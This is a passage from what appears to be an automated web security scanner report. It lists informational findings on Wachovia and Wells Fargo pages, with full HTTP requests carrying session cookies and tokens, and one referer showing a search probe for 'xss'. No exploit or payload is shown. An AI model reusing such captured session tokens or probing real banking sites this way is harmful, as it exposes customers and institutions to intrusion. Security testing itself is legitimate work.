Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=920DCE66B1EC10B13488C08483F0D444; JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 17 Nov 2008 22:44:21 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-82897584
Expires: Mon, 01 Dec 2008 22:44:21 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 36
Keep-Alive: timeout=10, max=193
Connection: Keep-Alive
Content-Type: text/css

/@import url(handheld.css) handheld;

20.11. https://www.wachovia.com/foundation/v/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Request

GET /foundation/v/index.jsp?vgnextoid=a47ea6e605ecd110VgnVCM200000627d6fa2RCRD HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069073761-New%7C1342605073761%3B; s_sess=%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B; uidServiceSelection=gotoBanking

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:12 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=140
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5273


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.12. https://www.wachovia.com/miscpop1197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /miscpop1197

Request

GET /miscpop1197 HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; uidServiceSelection=gotoBanking; wcp_hawk_accepted=true; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:58 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=126
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 4309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.13. https://www.wachovia.com/retirementlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /retirementlogin

Request

GET /retirementlogin HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1; TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069073761-New%7C1342605073761%3B; s_sess=%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B; uidServiceSelection=gotoBanking; wcp_hawk_accepted=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:14 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=157
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...

20.14. https://www.wellsfargo.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:58:53 GMT
Content-length: 8529
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

20.15. https://www.wellsfargo.com/com/contact_us_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/contact_us_form

Request

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/pi_action/rcboLocator
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:40 GMT
Content-length: 11161
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...

20.16. https://www.wellsfargo.com/com/rcbo_locator/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/rcbo_locator/search

Request

GET /com/rcbo_locator/search HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:20 GMT
Content-length: 7190
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...

20.17. https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial

Request

GET /com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/search/search?query=xss&searchBtn=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:00 GMT
Content-length: 5240
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>HMN Financial, Inc. ... Wells
...[SNIP]...

20.18. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; JSESSIONID=4EF7C30A5EF0B45DD6E1DC6B95DC840E; BRAND_COOKIE=COB; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:06:07 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 13796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

20.19. https://www.wellsfargo.com/help/faqs/signon_faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Request

GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/signon?LOB=CONS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; OB_SO_ORIGIN=LOB=CONS; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:47:10 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 14114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head><title>Wells Fargo Username/Password
...[SNIP]...

20.20. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zC